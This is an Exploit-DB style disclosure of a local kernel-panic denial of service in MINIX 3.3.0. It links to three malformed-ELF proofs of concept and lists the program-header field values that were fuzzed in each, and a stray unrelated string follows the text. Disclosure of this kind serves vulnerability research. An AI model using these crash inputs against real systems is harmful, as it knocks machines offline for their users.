# Exploit Title: MINIX 3.3.0 Local Denial of Service # Exploit Author: nitr0us # Vendor Homepage: www.minix3.org # Software Link: http://www.minix3.org/download/index.html # Version: 3.3.0 # Tested on: MINIX 3.3.0 x86 Attached three PoCs (malformed ELFs) and a screenshot of the panic. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35173.zip ---- MINIX 3.3.0 is prone to local kernel panic due to malformed program headers in an ELF executable. Attached three PoCs that panicked the OS, and their modified fields: ================================================================================= [+] Malformed ELF: 'orc_0064': [+] Fuzzing the Program Header Table with 4 entries (PHT[0]->p_vaddr = 0x08056919, p_paddr = 0xcafed00d) | PHT[0] rule [03] executed (PHT[0]->p_flags = 0xf0000005) | PHT[0] rule [10] executed (PHT[0]->p_flags = 0xfff00005) | PHT[0] rule [15] executed (PHT[3]->p_type = 0x0) | PHT[3] rule [01] executed (PHT[3]->p_vaddr = 0x1905af52, p_paddr = 0x1905af52) | PHT[3] rule [03] executed (PHT[3]->p_type = 0x70031337) | PHT[3] rule [06] executed (PHT[PT_LOAD].p_vaddr reordered [descending]) | PHT rule [20] executed ================================================================================= [+] Malformed ELF: 'orc_0090': [+] Fuzzing the Program Header Table with 4 entries (PHT[0]->p_offset = 0xffff0000) | PHT[0] rule [02] executed (PHT[3]->p_type = 0x7defaced) | PHT[3] rule [06] executed ================================================================================= [+] Malformed ELF: 'orc_0092': [+] Fuzzing the Program Header Table with 4 entries (PHT[0]->p_filesz = 0x0004fdec, p_memsz = 0x41424344) | PHT[0] rule [04] executed (PHT[3]->p_type = 0x6fffffff) | PHT[3] rule [14] =================================================================================
体验盒子